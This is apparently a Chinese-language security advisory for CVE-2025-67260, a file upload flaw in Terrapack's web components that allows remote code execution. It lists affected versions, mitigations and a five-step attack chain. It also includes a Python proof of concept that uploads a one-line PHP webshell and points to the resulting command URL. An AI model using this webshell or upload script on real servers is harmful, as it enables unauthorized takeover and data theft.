IPBUF安全漏洞报告
English
CVE-2025-67260 CVSS 8.8 高危

CVE-2025-67260 Terrapack文件上传漏洞

披露日期: 2026-03-20

漏洞信息

漏洞编号
CVE-2025-67260
漏洞类型
文件上传漏洞
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Terrapack

相关标签

RCE文件上传TerrapackCVE-2025-67260

漏洞概述

ASTER TEC的Terrapack软件多个组件存在文件上传漏洞。由于缺乏有效的安全验证,具有低权限的攻击者可通过网络上传恶意文件,导致在服务器上执行任意代码,严重影响系统机密性、完整性和可用性。

技术细节

该漏洞主要源于Terrapack软件的TkWebCoreNG、TKServerCGI及TpkWebGIS Client组件在处理文件上传功能时,未能实施严格的安全校验机制。攻击者无需复杂的权限提升,仅需低权限账户即可利用此漏洞。通过构造特定的HTTP POST请求,攻击者可以将包含恶意Webshell或可执行脚本的文件上传至服务器的Web可写目录。一旦文件上传成功,攻击者通过浏览器直接访问该文件路径,诱导服务器端解析执行其中的恶意代码。这将导致攻击者能够在目标系统上执行任意系统命令,完全控制受影响的服务器,造成敏感数据泄露或服务中断。

攻击链分析

STEP 1
侦察阶段
攻击者扫描网络,识别运行Terrapack软件且暴露在互联网上的目标服务器。
STEP 2
获取访问
利用弱口令或默认账户获取低权限用户账号,满足PR:L的攻击前提条件。
STEP 3
漏洞利用
构造恶意文件(如Webshell),通过存在漏洞的上传接口发送至服务器。
STEP 4
代码执行
访问上传文件的URL,触发服务器解析执行恶意代码,获取服务器权限。
STEP 5
维持控制
安装后门,窃取数据或进行横向移动,完全控制受影响系统。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://target-ip/upload_endpoint" username = "low_priv_user" password = "password" # Malicious payload (e.g., PHP webshell) payload_content = "<?php system($_GET['cmd']); ?>" # Prepare the file upload files = { 'uploaded_file': ('exploit.php', payload_content, 'application/octet-stream') } data = { 'action': 'upload' } try: # Send request with authentication response = requests.post(target_url, files=files, data=data, auth=(username, password)) if response.status_code == 200 and "upload successful" in response.text.lower(): print("[+] File uploaded successfully.") print(f"[+] Access your shell at: {target_url.replace('upload_endpoint', 'uploads/exploit.php')}?cmd=whoami") else: print("[-] Upload failed or unexpected response.") print(response.text) except Exception as e: print(f"[!] Error: {e}")

影响范围

Terrapack TkWebCoreNG 1.0.20200914
Terrapack TKServerCGI 2.5.4.150
Terrapack TpkWebGIS Client 1.0.0

防御指南

临时缓解措施
建议在未获得补丁前,通过网络访问控制列表(ACL)限制对Terrapack服务管理端口的访问,仅允许受信任的内部IP连接。同时,管理员应全面检查Web目录,排查是否存在异常上传的可疑脚本文件。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表